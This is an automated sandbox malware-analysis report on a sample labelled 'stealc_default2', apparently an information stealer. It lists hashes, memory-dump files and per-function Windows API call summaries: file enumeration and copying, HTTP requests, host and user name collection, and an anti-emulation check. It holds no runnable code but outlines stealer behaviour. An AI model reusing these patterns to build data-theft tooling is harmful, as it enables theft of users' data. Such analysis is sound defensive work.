Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 0453f5b1f101ea299e01007dbde4720f116050ef9f172950dfa2c2e1940a1008
Instruction ID: 88e200cffbed426ee345b8f3054eebb48360f271fdc990e0ba4244824cbda4ce
Opcode Fuzzy Hash: 0453f5b1f101ea299e01007dbde4720f116050ef9f172950dfa2c2e1940a1008
Instruction Fuzzy Hash: 0FF03AB0988209FAE700BBA09D4ABBD7B34EB04701F208615B512A11C1DBB95940E757

Function 00776D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`ow, xrefs: 00776E94, 00776DD2, 00776DAE, 00776E5E, 00776EAF

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID:
String ID: `ow
API String ID: 0-2610069957
Opcode ID: 2a59147b4a8115d19dbce6a77ad54bf570b90a9ad14a93a1ad6548dd4a5f11b7
Instruction ID: 31be4139ae9a9620a1fe30db355814e424ef380b65049646c295db26da8622c5
Opcode Fuzzy Hash: 2a59147b4a8115d19dbce6a77ad54bf570b90a9ad14a93a1ad6548dd4a5f11b7
Instruction Fuzzy Hash: 0E6108B4A00618DFCF14DF94E988BEEB7B0BB04344F108598E41967289D779AF94DF91

Function 00784BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784BEA
lstrcatA.KERNEL32(?,00D00000), ref: 00784C08

Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943

Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92

Part of subcall function 00784910: wsprintfA.USER32 ref: 007849B0
Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,007908D2), ref: 007849C5
Part of subcall function 00784910: wsprintfA.USER32 ref: 007849E2
Part of subcall function 00784910: PathMatchSpecA.SHLWAPI(?,?), ref: 00784A1E
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00CFD8E8,?,000003E8), ref: 00784A4A
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FF8), ref: 00784A5C
Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A70
Part of subcall function 00784910: lstrcatA.KERNEL32(?,00790FFC), ref: 00784A82
Part of subcall function 00784910: lstrcatA.KERNEL32(?,?), ref: 00784A96
Part of subcall function 00784910: CopyFileA.KERNEL32(?,?,00000001), ref: 00784AAC
Part of subcall function 00784910: DeleteFileA.KERNEL32(?), ref: 00784B31

Part of subcall function 00784910: wsprintfA.USER32 ref: 00784A07

Strings

Uax, xrefs: 00784C2F, 00784C64, 00784C9A, 00784CCF, 00784D05, 00784D3A, 00784D5F, 00784C32, 00784C67, 00784C9D, 00784CD2, 00784D08, 00784D3D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: Uax
API String ID: 2104210347-3071186593
Opcode ID: efef00cb4f3d71e630850b57f8aad7d7b59013d6a4789015f5b61d61d4e7565e
Instruction ID: 2e2e6a990b07a191e9e8feccf0dd97381126901c30582d41e0ccd20d1a174338
Opcode Fuzzy Hash: efef00cb4f3d71e630850b57f8aad7d7b59013d6a4789015f5b61d61d4e7565e
Instruction Fuzzy Hash: 9D41E7B7514104ABCB94FBA4EC46EFE337DA788700F408648B54957186FD796B888BE3

Function 007851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 00776280: InternetOpenA.WININET(00790DFE,00000001,00000000,00000000,00000000), ref: 007762E1
Part of subcall function 00776280: StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776303
Part of subcall function 00776280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00776335
Part of subcall function 00776280: HttpOpenRequestA.WININET(00000000,GET,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00776385
Part of subcall function 00776280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007763BF
Part of subcall function 00776280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007763D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785228

Strings

ERROR, xrefs: 0078521A
ERROR, xrefs: 00785273

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: e47b0f1e13bc9eb03d4b775e7e15df09b8c65eae1aeb169e17d96706ac4adbd5
Instruction ID: 15cd268c48a475c492e4a33e5c2a793261e6ff643f998851ee801440648a35cb
Opcode Fuzzy Hash: e47b0f1e13bc9eb03d4b775e7e15df09b8c65eae1aeb169e17d96706ac4adbd5
Instruction Fuzzy Hash: B0112170950008F7DB18FF64DD9AAED7378AF50340F808165F81A46592EF3C6B15C792

Function 00785050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0078508A
lstrcatA.KERNEL32(?,00CFFCC0), ref: 007850A8

Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943

Strings

ax, xrefs: 007850CF, 007850F4, 007850D2

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: ax
API String ID: 2699682494-3322492788
Opcode ID: c5e9ca060581b507203af31c0721170d4caec3914e381843bcf241c46e5eef2d
Instruction ID: 54aa8dfa58346b25cc5b8aa73a615f538e34f4b64bb22a986531a92ede1db629
Opcode Fuzzy Hash: c5e9ca060581b507203af31c0721170d4caec3914e381843bcf241c46e5eef2d
Instruction Fuzzy Hash: 5901D676954208A7CB54FB70DC4AEEE337CAB54300F404284F64952181EE78AAC88BE3

Function 007878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 19d5f9ff2aeff3733a07d2eac2a21f58080fdee84eb3cc48b44f2393aec9dc7a
Instruction ID: 6de3c31e37389cea4335a144a04d114325fb1cc662ac37c0905d63ef4fc0cffc
Opcode Fuzzy Hash: 19d5f9ff2aeff3733a07d2eac2a21f58080fdee84eb3cc48b44f2393aec9dc7a
Instruction Fuzzy Hash: 3A0186B1958204EFC714DF95DD45BAABBB8F704B21F104219F545E3680D3785940CBA1

Function 00789470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00789484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 007894A5
CloseHandle.KERNEL32(00000000), ref: 007894AF

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 86a0a554beb72a1eda8128286f7bc45a4d2e7011aad00bf6b789fd98763c64d6
Instruction ID: 0ac27e5cddd900ea70cde116b98b476b6d33b44d668382d444c1d86b79b81255
Opcode Fuzzy Hash: 86a0a554beb72a1eda8128286f7bc45a4d2e7011aad00bf6b789fd98763c64d6
Instruction Fuzzy Hash: B3F05E7494420CFBDB04EFA4DD4AFEE7778EB08310F004598BB0997290D6B4AE85DB91

Function 00771110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00786A1C), ref: 0077112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00786A1C), ref: 00771132
ExitProcess.KERNEL32 ref: 00771143

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: c590a29016fce6687857455c5b6609c7db83ba83f5a591fd7f3fd24a79160cac
Instruction ID: 6e3f7287121355e486c69055082f519e0d13b8309f3126f6fd9faaa368cf191d
Opcode Fuzzy Hash: c590a29016fce6687857455c5b6609c7db83ba83f5a591fd7f3fd24a79160cac
Instruction Fuzzy Hash: 4DE0867095930CFBEB106BA4DD0EB087678AB04B51F504154F7087A5C0D6B52600A799

Function 00781A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 00787500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00787542
Part of subcall function 00787500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0078757F
Part of subcall function 00787500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787603
Part of subcall function 00787500: HeapAlloc.KERNEL32(00000000), ref: 0078760A

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 00787690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007876A4
Part of subcall function 00787690: HeapAlloc.KERNEL32(00000000), ref: 007876AB

Part of subcall function 007877C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0078DBC0,000000FF,?,00781C99,00000000,?,00D00300,00000000,?), ref: 007877F2
Part of subcall function 007877C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0078DBC0,000000FF,?,00781C99,00000000,?,00D00300,00000000,?), ref: 007877F9

Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F

